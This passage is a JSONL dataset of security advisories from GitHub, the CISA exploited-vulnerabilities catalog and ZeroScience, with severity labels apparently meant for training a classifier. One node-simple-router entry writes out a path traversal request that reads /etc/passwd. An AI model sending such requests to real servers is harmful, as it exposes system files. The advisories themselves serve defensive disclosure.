Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-23", "split": "train"} -{"id": "ea4606bbf055a1529c35", "text": "Apache Shiro Code Execution Vulnerability\n\nAffected: Apache Shiro\n\nApache Shiro contains a vulnerability which may allow remote attackers to execute code or bypass intended access restrictions via an unspecified request parameter when a cipher key has not been configured for the \"remember me\" feature.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apache Shiro Code Execution Vulnerability\n\nAffected: Apache Shiro\n\nApache Shiro contains a vulnerability which may allow remote attackers to execute code or bypass intended access restrictions via an unspecified request parameter when a cipher key has not been configured for the \"remember me\" feature.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "4c036081767d837471fc", "text": "Denial of Service and Content Injection in i18n-node-angular\n\nVersions of `i18n-node-angular` prior to 1.4.0 are affected by denial of service and cross-site scripting vulnerabilities. The vulnerabilities exist in a REST endpoint that was created for development purposes, but was not disabled in production in affected versions.\n\n## Recommendation\n\nUpdate to version 1.4.0 or later.", "text_raw": "Denial of Service and Content Injection in i18n-node-angular\n\n[Severity: HIGH]\n\nVersions of `i18n-node-angular` prior to 1.4.0 are affected by denial of service and cross-site scripting vulnerabilities. The vulnerabilities exist in a REST endpoint that was created for development purposes, but was not disabled in production in affected versions.\n\n\n## Recommendation\n\nUpdate to version 1.4.0 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "e3d067ea29625f5864d5", "text": "Apple Multiple Products WebKit Storage Use-After-Free Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, watchOS, and Safari WebKit Storage contain a use-after-free vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apple Multiple Products WebKit Storage Use-After-Free Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, watchOS, and Safari WebKit Storage contain a use-after-free vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "a6915b4b82c7ff52e898", "text": "Buffer overrun in CGI.escape_html\n\nA buffer overrun vulnerability was discovered in CGI.escape_html. This can lead to a buffer overflow when a user passes a very large string (> 700 MB) to CGI.escape_html on a platform where long type takes 4 bytes, typically, Windows.", "text_raw": "Buffer overrun in CGI.escape_html\n\n[Severity: CRITICAL]\n\nA buffer overrun vulnerability was discovered in CGI.escape_html. This can lead to a buffer overflow when a user passes a very large string (> 700 MB) to CGI.escape_html on a platform where long type takes 4 bytes, typically, Windows.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-12-14", "split": "train"} -{"id": "342efd73469cac47ff80", "text": "Spina gem vulnerable to Cross-site request forgery (CSRF) vulnerability\n\nCross-site request forgery (CSRF) vulnerability in Spina before commit bfe44f289e336f80b6593032679300c493735e75. `Spina::ApplicationController` actions didn't have CSRF protection. This causes a CSRF vulnerability across the entire engine which includes administrative functionality such as creating users, changing passwords, and media management.", "text_raw": "Spina gem vulnerable to Cross-site request forgery (CSRF) vulnerability\n\n[Severity: HIGH]\n\nCross-site request forgery (CSRF) vulnerability in Spina before commit bfe44f289e336f80b6593032679300c493735e75. `Spina::ApplicationController` actions didn't have CSRF protection. This causes a CSRF vulnerability across the entire engine which includes administrative functionality such as creating users, changing passwords, and media management.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-08-28", "split": "train"} -{"id": "9ecb838dc179e2d3ea70", "text": "An issue was discovered in hsweb 3.0.4. It is a reflected XSS vulnerability due to the absence of type parameter checking in FlowableModelManagerController.java.", "text_raw": "Moderate severity vulnerability that affects org.hswebframework.web:hsweb-commons\n\n[Severity: MEDIUM]\n\nAn issue was discovered in hsweb 3.0.4. It is a reflected XSS vulnerability due to the absence of type parameter checking in FlowableModelManagerController.java.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-01-04", "split": "train"} -{"id": "34f84614c8a4f6583b15", "text": "In Bouncy Castle JCE Provider the ECIES implementation allowed the use of ECB mode\n\nIn the Bouncy Castle JCE Provider version 1.55 and earlier the ECIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.", "text_raw": "In Bouncy Castle JCE Provider the ECIES implementation allowed the use of ECB mode\n\n[Severity: HIGH]\n\nIn the Bouncy Castle JCE Provider version 1.55 and earlier the ECIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "ecc98573b0504bfffc44", "text": "JSNAPy allows unprivileged local users to alter files under the directory\n\nJSNAPy is an open source python version of Junos Snapshot Administrator developed by Juniper available through github. The default configuration and sample files of JSNAPy automation tool versions prior to 1.3.0 are created world writable. This insecure file and directory permission allows unprivileged local users to alter the files under this directory including inserting operations not intended by the package maintainer, system administrator, or other users. This issue only affects users who downloaded and installed JSNAPy from github.", "text_raw": "JSNAPy allows unprivileged local users to alter files under the directory\n\n[Severity: HIGH]\n\nJSNAPy is an open source python version of Junos Snapshot Administrator developed by Juniper available through github. The default configuration and sample files of JSNAPy automation tool versions prior to 1.3.0 are created world writable. This insecure file and directory permission allows unprivileged local users to alter the files under this directory including inserting operations not intended by the package maintainer, system administrator, or other users. This issue only affects users who downloaded and installed JSNAPy from github.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-12", "split": "train"} -{"id": "e33ec7aa22853a1d8e54", "text": "Directory Traversal in node-simple-router\n\nAffected versions of `node-simple-router` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nUpdate to v0.10.1 or later.", "text_raw": "Directory Traversal in node-simple-router\n\n[Severity: HIGH]\n\nAffected versions of `node-simple-router` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nUpdate to v0.10.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-24", "split": "train"} -{"id": "19d19388c172f0f3a92b", "text": "Policies not properly enforced in bluemonday\n\nThe bluemonday sanitizer before 1.0.16 for Go, and before 0.0.8 for Python (in pybluemonday), does not properly enforce policies associated with the SELECT, STYLE, and OPTION elements.", "text_raw": "Policies not properly enforced in bluemonday\n\n[Severity: HIGH]\n\nThe bluemonday sanitizer before 1.0.16 for Go, and before 0.0.8 for Python (in pybluemonday), does not properly enforce policies associated with the SELECT, STYLE, and OPTION elements.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-19", "split": "train"} -{"id": "9ae5648aebfebf64cedd", "text": "Thrive Smart Home v1.1 SQL Injection Authentication Bypass", "text_raw": "Thrive Smart Home v1.1 SQL Injection Authentication Bypass\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2019-12-29", "split": "train"} -{"id": "4d71d5ddb117164efc8e", "text": "Sensitive information disclosure via log in com.bmuschko:gradle-vagrant-plugin\n\n### Impact\n\nThe `com.bmuschko:gradle-vagrant-plugin` Gradle plugin contains an information disclosure vulnerability due to the logging of the system environment variables.\n\nWhen this Gradle plugin is executed in public CI/CD, this can lead to sensitive credentials being exposed to malicious actors.\n\n### Patches\nFixed in version 3.0.0\n\n### References\n\n- https://github.com/bmuschko/gradle-vagrant-plugin/blob/292129f9343d00d391543fae06239e9b0f33db73/src/main/groovy/com/bmuschko/gradle/vagrant/process/GDKExternalProcessExecutor.groovy#L42-L44\n - https://github.com/bmuschko/gradle-vagrant-plugin/issues/19\n - https://github.com/bmuschko/gradle-vagrant-plugin/pull/20\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [bmuschko/gradle-vagrant-plugin](https://github.com/bmuschko/gradle-vagrant-plugin)", "text_raw": "Sensitive information disclosure via log in com.bmuschko:gradle-vagrant-plugin\n\n[Severity: HIGH]\n\n### Impact\n\nThe `com.bmuschko:gradle-vagrant-plugin` Gradle plugin contains an information disclosure vulnerability due to the logging of the system environment variables.\n\nWhen this Gradle plugin is executed in public CI/CD, this can lead to sensitive credentials being exposed to malicious actors.\n\n### Patches\nFixed in version 3.0.0\n\n### References\n\n - https://github.com/bmuschko/gradle-vagrant-plugin/blob/292129f9343d00d391543fae06239e9b0f33db73/src/main/groovy/com/bmuschko/gradle/vagrant/process/GDKExternalProcessExecutor.groovy#L42-L44\n - https://github.com/bmuschko/gradle-vagrant-plugin/issues/19\n - https://github.com/bmuschko/gradle-vagrant-plugin/pull/20\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [bmuschko/gradle-vagrant-plugin](https://github.com/bmuschko/gradle-vagrant-plugin)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-09", "split": "train"} -{"id": "24ba08e4748ec5efff72", "text": "Atlassian Confluence Server and Data Center Path Traversal Vulnerability\n\nAffected: Atlassian Confluence Server and Data Center\n\nAtlassian Confluence Server and Data Center contain a path traversal vulnerability in the downloadallattachments resource that may allow a privileged, remote attacker to write files. Exploitation can lead to remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Atlassian Confluence Server and Data Center Path Traversal Vulnerability\n\nAffected: Atlassian Confluence Server and Data Center\n\nAtlassian Confluence Server and Data Center contain a path traversal vulnerability in the downloadallattachments resource that may allow a privileged, remote attacker to write files. Exploitation can lead to remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "2db08e6e5818471f53bb", "text": "Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution", "text_raw": "Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2017-12-27", "split": "train"} -{"id": "1783b17642f7ace2912c", "text": "PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability", "text_raw": "PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2012-11-26", "split": "train"} -{"id": "aa40920192ae6f01a404", "text": "Denial of service in Apache Xerces2\n\nXMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.", "text_raw": "Denial of service in Apache Xerces2\n\n[Severity: MEDIUM]\n\nXMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-06-15", "split": "train"} -{"id": "e7984cf665ffc36fb8f8", "text": "Use of \"infinity\" as an input to datetime and date fields causes infinite loop in pydantic\n\nImpact\n\nPassing either 'infinity', 'inf' or float('inf') (or their negatives) to datetime or date fields causes validation to run forever with 100% CPU usage (on one CPU).\nPatches\n\nPydantic is be patched with fixes available in the following versions:\n\nv1.8.2\n v1.7.4\n v1.6.2\n\nAll these versions are available on pypi, and will be available on conda-forge soon.\n\nSee the changelog for details.\nWorkarounds\n\nIf you absolutely can't upgrade, you can work around this risk using a validator to catch these values, brief demo:\n\nfrom datetime import date\nfrom pydantic import BaseModel, validator\n\nclass DemoModel(BaseModel):\n date_of_birth: date\n\n@validator('date_of_birth', pre=True)\n def skip_infinite_values(cls, v):\n try:\n seconds = float(v)\n except (ValueError, TypeError):\n return v\n else:\n if seconds == float('inf'):\n return date.max\n elif seconds == float('-inf'):\n return date.min\n else:\n return seconds\n\nNote: this is not an ideal solution (in particular you'll need a slightly different function for datetimes), instead of a hack like this you should upgrade pydantic.\n\nIf you are not using v1.8.x, v1.7.x or v1.6.x and are unable to upgrade to a fixed version of pydantic, please create an issue requesting a back-port, and we will endeavour to release a patch for earlier versions of pydantic.\nReferences\n\nThis was fixed in commit 7e83fdd.", "text_raw": "Use of \"infinity\" as an input to datetime and date fields causes infinite loop in pydantic\n\n[Severity: MEDIUM]\n\n\nImpact\n\nPassing either 'infinity', 'inf' or float('inf') (or their negatives) to datetime or date fields causes validation to run forever with 100% CPU usage (on one CPU).\nPatches\n\nPydantic is be patched with fixes available in the following versions:\n\n v1.8.2\n v1.7.4\n v1.6.2\n\nAll these versions are available on pypi, and will be available on conda-forge soon.\n\nSee the changelog for details.\nWorkarounds\n\nIf you absolutely can't upgrade, you can work around this risk using a validator to catch these values, brief demo:\n\nfrom datetime import date\nfrom pydantic import BaseModel, validator\n\nclass DemoModel(BaseModel):\n date_of_birth: date\n\n @validator('date_of_birth', pre=True)\n def skip_infinite_values(cls, v):\n try:\n seconds = float(v)\n except (ValueError, TypeError):\n return v\n else:\n if seconds == float('inf'):\n return date.max\n elif seconds == float('-inf'):\n return date.min\n else:\n return seconds\n\nNote: this is not an ideal solution (in particular you'll need a slightly different function for datetimes), instead of a hack like this you should upgrade pydantic.\n\nIf you are not using v1.8.x, v1.7.x or v1.6.x and are unable to upgrade to a fixed version of pydantic, please create an issue requesting a back-port, and we will endeavour to release a patch for earlier versions of pydantic.\nReferences\n\nThis was fixed in commit 7e83fdd.\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-13", "split": "train"} -{"id": "ba2372634e8129ea0f64", "text": "Unrestricted access to predictable file paths in hov/jobfair\n\nAn issue was discovered in the jobfair (aka Job Fair) extension before 1.0.13 and 2.x before 2.0.2 for TYPO3. The extension fails to protect or obfuscate filenames of uploaded files. This allows unauthenticated users to download files with sensitive data by simply guessing the filename of uploaded files (e.g., uploads/tx_jobfair/cv.pdf).", "text_raw": "Unrestricted access to predictable file paths in hov/jobfair\n\n[Severity: HIGH]\n\nAn issue was discovered in the jobfair (aka Job Fair) extension before 1.0.13 and 2.x before 2.0.2 for TYPO3. The extension fails to protect or obfuscate filenames of uploaded files. This allows unauthenticated users to download files with sensitive data by simply guessing the filename of uploaded files (e.g., uploads/tx_jobfair/cv.pdf).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-11-15", "split": "train"} -{"id": "60aa1f4b6ada083f2a67", "text": "Arbitrary Code Execution in mathjs\n\nmath.js before 3.17.0 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result arbitrary execution.\n\n## Recommendation\n\nUpdate to version 3.17.0 or later.", "text_raw": "Arbitrary Code Execution in mathjs\n\n[Severity: CRITICAL]\n\nmath.js before 3.17.0 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result arbitrary execution.\n\n\n## Recommendation\n\nUpdate to version 3.17.0 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2017-12-18", "split": "train"} -{"id": "cdfbe2f4d3bf24c0f3d2", "text": "Malicious Package in js-sla3\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in js-sla3\n\n[Severity: CRITICAL]\n\nVersion 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "d45e2e97db7895170fbb", "text": "Uncontrolled Resource Consumption in transpile\n\nAll versions of package transpile are vulnerable to Denial of Service (DoS) due to a lack of input sanitization or whitelisting, coupled with improper exception handling in the .to() function.", "text_raw": "Uncontrolled Resource Consumption in transpile\n\n[Severity: MEDIUM]\n\nAll versions of package transpile are vulnerable to Denial of Service (DoS) due to a lack of input sanitization or whitelisting, coupled with improper exception handling in the .to() function.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-09-02", "split": "train"} -{"id": "836a21966464aa12277e", "text": "Malicious Package in bs85check\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in bs85check\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "6cd7da946cbb23887dba", "text": "Downloads Resources over HTTP in pm2-kafka\n\nAffected versions of `pm2-kafka` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `pm2-kafka`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in pm2-kafka\n\n[Severity: HIGH]\n\nAffected versions of `pm2-kafka` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `pm2-kafka`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "a2907059473bd7ad3d67", "text": "V-SOL GPON/EPON OLT Platform v2.03 Unauthenticated Configuration Download", "text_raw": "V-SOL GPON/EPON OLT Platform v2.03 Unauthenticated Configuration Download\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2019-09-26", "split": "train"} -{"id": "ddf6ce5441ca941c3fb3", "text": "Cross-site Scripting in actionpack\n\nCross-site scripting (XSS) vulnerability in `actionpack/lib/action_view/helpers/form_options_helper.rb` in the select helper in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving certain generation of OPTION elements within SELECT elements.", "text_raw": "Cross-site Scripting in actionpack\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in `actionpack/lib/action_view/helpers/form_options_helper.rb` in the select helper in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving certain generation of OPTION elements within SELECT elements.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "8d63fd3931de8d5d4e78", "text": "Go JOSE Signature Validation Bypass\n\nGo JOSE before 1.1.0 suffers from multiple signatures exploitation. The go-jose library supports messages with multiple signatures. However, when validating a signed message the API did not indicate which signature was valid, which could potentially lead to confusion. For example, users of the library might mistakenly read protected header values from an attached signature that was different from the one originally validated", "text_raw": "Go JOSE Signature Validation Bypass\n\n[Severity: HIGH]\n\nGo JOSE before 1.1.0 suffers from multiple signatures exploitation. The go-jose library supports messages with multiple signatures. However, when validating a signed message the API did not indicate which signature was valid, which could potentially lead to confusion. For example, users of the library might mistakenly read protected header values from an attached signature that was different from the one originally validated", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "c77ae967d9a14ba6bd44", "text": "Eibiz i-Media Server Digital Signage 3.8.0 Configuration Disclosure", "text_raw": "Eibiz i-Media Server Digital Signage 3.8.0 Configuration Disclosure\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2020-08-21", "split": "train"} -{"id": "4fd3d6918f1b4caa77b9", "text": "Cross-Site Scripting (XSS) in pivottable\n\nAffected versions of `pivottable` are vulnerable to cross-site scripting, due to a new mechanism used to render JSON elements.\n\n## Recommendation\n\nUpdate to version 2.0.0 or later.", "text_raw": "Cross-Site Scripting (XSS) in pivottable\n\n[Severity: HIGH]\n\nAffected versions of `pivottable` are vulnerable to cross-site scripting, due to a new mechanism used to render JSON elements.\n\n\n## Recommendation\n\nUpdate to version 2.0.0 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "dd1474b9f1ec9ecec00d", "text": "Apache Struts Remote Code Execution Vulnerability\n\nAffected: Apache Struts\n\nApache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apache Struts Remote Code Execution Vulnerability\n\nAffected: Apache Struts\n\nApache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "eb300e9590094e423bd1", "text": "meterN v1.2.3 Authenticated Remote Command Execution Vulnerability", "text_raw": "meterN v1.2.3 Authenticated Remote Command Execution Vulnerability\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2021-12-13", "split": "train"} -{"id": "3b856194da7a6e42a4f8", "text": "Orthanc DICOM Server 1.1.0 Remote Memory Corruption Vulnerability", "text_raw": "Orthanc DICOM Server 1.1.0 Remote Memory Corruption Vulnerability\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2016-12-16", "split": "train"} -{"id": "b148d840abd9118dbaad", "text": "Improper Input Validation in alilibaba:fastjson\n\nparseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.", "text_raw": "Improper Input Validation in alilibaba:fastjson\n\n[Severity: CRITICAL]\n\nparseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-10-24", "split": "train"} -{"id": "4000d1a6e0007d1f064d", "text": "iScripts EasyCreate 3.0 Remote Code Execution Exploit", "text_raw": "iScripts EasyCreate 3.0 Remote Code Execution Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2016-01-28", "split": "train"} -{"id": "1a19aa0252fdb98d1012", "text": "libsecp256k1 contains side-channel timing attack\n\nVersions of libsecp256k1 prior to 0.3.1 did not execute `Scalar::check_overflow` in constant time. This allows an attacker to potentially leak information via a timing attack. The flaw was corrected by modifying `Scalar::check_overflow` to execute in constant time.", "text_raw": "libsecp256k1 contains side-channel timing attack\n\n[Severity: HIGH]\n\nVersions of libsecp256k1 prior to 0.3.1 did not execute `Scalar::check_overflow` in constant time. This allows an attacker to potentially leak information via a timing attack. The flaw was corrected by modifying `Scalar::check_overflow` to execute in constant time.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "b912162f65548ec06c2a", "text": "Possible Open Redirect Vulnerability in Action Pack\n\nThere is a possible Open Redirect Vulnerability in Action Pack.\n\nVersions Affected: >= v6.1.0.rc2\nNot affected: < v6.1.0.rc2\nFixed Versions: 6.1.3.2\n\nImpact\n------\nThis is similar to CVE-2021-22881. Specially crafted Host headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious\nwebsite.\n\nSince rails/rails@9bc7ea5, strings in config.hosts that do not have a leading dot are converted to regular expressions without proper escaping. This causes, for example, config.hosts << \"sub.example.com\" to permit a request with a Host header value of sub-example.com.\n\nReleases\n--------\nThe fixed releases are available at the normal locations.\n\nWorkarounds\n-----------\nThe following monkey patch put in an initializer can be used as a workaround.\n\n```ruby\nclass ActionDispatch::HostAuthorization::Permissions\n def sanitize_string(host)\n if host.start_with?(\".\")\n /\\A(.+\\.)?#{Regexp.escape(host[1..-1])}\\z/i\n else\n /\\A#{Regexp.escape host}\\z/i\n end\n end\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n* 6-1-open-redirect.patch - Patch for 6.1 series\n\nPlease note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.\n\nCredits\n-------\n\nThanks Jonathan Hefner (https://hackerone.com/jonathanhefner) for reporting this bug!", "text_raw": "Possible Open Redirect Vulnerability in Action Pack\n\n[Severity: MEDIUM]\n\nThere is a possible Open Redirect Vulnerability in Action Pack.\n\nVersions Affected: >= v6.1.0.rc2\nNot affected: < v6.1.0.rc2\nFixed Versions: 6.1.3.2\n\nImpact\n------\nThis is similar to CVE-2021-22881. Specially crafted Host headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious\nwebsite.\n\nSince rails/rails@9bc7ea5, strings in config.hosts that do not have a leading dot are converted to regular expressions without proper escaping. This causes, for example, config.hosts << \"sub.example.com\" to permit a request with a Host header value of sub-example.com.\n\n\nReleases\n--------\nThe fixed releases are available at the normal locations.\n\nWorkarounds\n-----------\nThe following monkey patch put in an initializer can be used as a workaround.\n\n```ruby\nclass ActionDispatch::HostAuthorization::Permissions\n def sanitize_string(host)\n if host.start_with?(\".\")\n /\\A(.+\\.)?#{Regexp.escape(host[1..-1])}\\z/i\n else\n /\\A#{Regexp.escape host}\\z/i\n end\n end\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n* 6-1-open-redirect.patch - Patch for 6.1 series\n\nPlease note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.\n\nCredits\n-------\n\nThanks Jonathan Hefner (https://hackerone.com/jonathanhefner) for reporting this bug!", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-05", "split": "train"} -{"id": "8a7eed701ba10ca10c2c", "text": "Server-Side Request Forgery vulnerability in concrete5\n\nA Server-Side Request Forgery vulnerability was found in concrete5 < 8.5.5 that allowed a decimal notation encoded IP address to bypass the limitations in place for localhost allowing interaction with local services. Impact can vary depending on services exposed.", "text_raw": "Server-Side Request Forgery vulnerability in concrete5\n\n[Severity: HIGH]\n\nA Server-Side Request Forgery vulnerability was found in concrete5 < 8.5.5 that allowed a decimal notation encoded IP address to bypass the limitations in place for localhost allowing interaction with local services. Impact can vary depending on services exposed.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "f572943f9bfb6b3ef2f2", "text": "No Restriction of Excessive Authentication Attempts in Firefly III\n\nfirefly-iii is vulnerable to Improper Lack of Restriction of Excessive Authentication 